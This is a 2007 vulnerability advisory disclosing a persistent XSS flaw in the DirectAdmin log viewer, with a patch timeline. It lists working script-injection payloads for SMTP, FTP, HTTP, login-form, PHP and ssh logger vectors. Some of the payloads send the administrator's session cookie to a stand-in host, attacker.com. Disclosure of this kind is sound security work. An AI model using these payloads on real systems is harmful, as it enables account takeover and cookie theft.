directadmin1293-xss.txt

`+ Subject:  
DirectAdmin persistant XSS [takeover an Administrator`s account]  
  
+ Version:  
< DirectAdmin 1.29.3  
  
+ Discovered by:  
Kanedaaa: http://kaneda.bohater.net  
  
+ DirectAdmin Description:  
DirectAdmin is a popular, advanced Web Control Panel with many features   
for webhosting. www.directadmin.com  
  
+ Persistant XSS Description:  
It is possible to take over an Administrator`s account by injecting   
persistent XSS data to the System Logs [/var/log/*].  
When DirectAdmin's Administrator goes to Admin Tools/Log Viewer and press   
"Show log" to display logs - he can be a victim of XSS attack and his   
session can be easily taken over - which means that it is possible to run   
any command with DirectAdmin's Administrator priviliges.  
  
I found out that 7 from 15 log files in the menu, could be used as means   
of injecting XSS to a system with no login credentials required.  
Next 3 of them are possible to be injected when you are logged as a valid   
user in the DirectAdmin.  
  
I was testing DirectAdmin on default Debian 4.0 installation but in   
general it should be working for other platforms too (with small changes I   
guess).  
  
Details:  
  
I) Examples of an attack without login credentials:  
  
1)  
Log file: /var/log/exim/rejectlog, /var/log/exim/mainlog  
  
Data is sent to IP with DirectAdmin to port 25:  
vrfy </textarea><script>alert('0wned:'+escape(document.cookie));</script>  
  
Lines in log files:  
mainlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected   
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>  
rejectlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected   
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>  
  
  
2)  
Log file: /var/log/proftpd/auth.log  
  
Data is sent to IP with DirectAdmin to port 21:  
user </textarea><script>alert('0wned:'+escape(document.cookie));</script>  
  
Lines in log files:  
auth.log:ProFTPd [28114] 123.123.123.123 [23/Mar/2007:19:29:26 +0100]   
"USER </textarea><script>alert('0wned:'+escape(document.cookie));</script>" 331  
  
  
3)  
Log file: /var/log/httpd/error_log  
  
Data is sent to IP with DirectAdmin to port 80:  
GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script>  
  
Lines in log files:  
error_log:[Fri Mar 23 19:33:37 2007] [error] [client 123.123.123.123]   
request failed: erroneous characters after protocol string: GET /   
</textarea><script>alert('0wned:'+escape(document.cookie));</script>  
  
  
4)  
Log file: /var/log/httpd/access_Log  
  
Data is sent to "free (not attached to any user)" IP to port 80 (using   
wget):  
wget IP   
--user-agent="</textarea><script>alert('0wned:'+escape(document.cookie));</script>"  
  
Lines in log files:  
access_log:123.123.123.123 - - [23/Mar/2007:19:36:46 +0100] "GET /   
HTTP/1.0" 200 2673 "-"   
"</textarea><script>alert('0wned:'+escape(document.cookie));</script>"  
  
5)  
Log file: /var/log/directadmin/error.log  
  
Data is sent to first DirectAdmin login page:  
login:   
</textarea><script>alert('0wned:'+escape(document.cookie));</script>  
password: any (not empty)  
  
Lines in log files:  
error.log:2007:03:23-19:39:44: Auth::passValid: unable to get user_info   
for </textarea><script>alert('0wned:'+escape(document.cookie));</script>  
  
6)  
Log file: /var/log/directadmin/security.log  
  
Data is sent to first DirectAdmin login page:  
login:   
</textarea><script>alert('0wned:'+escape(document.cookie));</script>  
  
Lines in log files:  
security.log:2007:03:23-19:39:44: *** 123.123.123.123 has tried to login   
with an invalid username:   
'</textarea><script>alert('0wned:'+escape(document.cookie));</script>' ***  
  
  
  
II) Examples of an attack with login credentials:  
  
1)  
Log file: /var/log/directadmin/security.log  
Via WWW:   
http://directadminsite:2222/CMD_ADDITIONAL_DOMAINS?domain=login.domain.com</textarea><script>alert('XSS');</script>  
  
Via ftp login: lftp login@directadmin:/> get   
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"  
  
2)  
Log file: /var/log/messages  
via php: <?php system('/usr/bin/logger   
"</textarea><script>location.href=\'http://attacker.com/xss.php?cook=\'+escape(document.cookie)</script>"');   
?>  
  
3)  
Log file: /var/log/messages  
via ssh: /usr/bin/logger   
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"  
  
  
Timeline:  
2007.02.25 bug discovered  
2007.03.00 bug tested  
2007.03.23 bug sent via Technical Support mail from http://www.directadmin.com/support.html  
2007.03.24 fast response after few hours from DirectAdmin : Thanks for the report. Fix will be out within a few hours with DA 1.29.3  
2007.03.24 DirectAdmin 1.29.3 Patched - Overview : use html characters for log viewer, Description: Ensure all charcters are html encoded when viewing logs through the log viewer.  
  
Original Advisory:   
http://kaneda.bohater.net/security/20070323-directadmin_persistant_xss_takeover_administrator_account.php  
  
--   
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..  
[+] You can take our lives,but you will never take our Freedom - W.Wallace  
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama  
[+] Revolution the only solution - System of a down...  
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0  
[-] Kanedaaa... Bohateur... Cucumber Team Member... [email protected]  
`